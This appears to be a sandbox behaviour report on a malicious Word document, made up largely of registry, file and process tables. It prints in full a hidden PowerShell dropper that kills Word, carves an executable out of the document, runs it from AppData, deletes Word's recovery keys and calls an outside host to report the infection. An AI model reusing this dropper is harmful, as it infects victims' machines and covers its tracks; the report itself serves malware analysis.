| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Enumerate Values | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Enumerate Values | - | - |
|
2 | |
| Enumerate Values | - | - |
|
2 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_CURRENT_USER | - |
|
96 | |
| Get Key Info | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
|
For performance reasons, the remaining 231 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\taskkill.exe" /f /im winword.exe | os_pid = 0x5f4, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
131 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| Get Environment String | name = TEMP, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x370 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
428
0x
9A4
0x
994
0x
458
0x
A60
0x
B4
0x
9CC
0x
92C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\result.exex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
9 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
6 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
101 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
7 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 360, size_out = 0 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
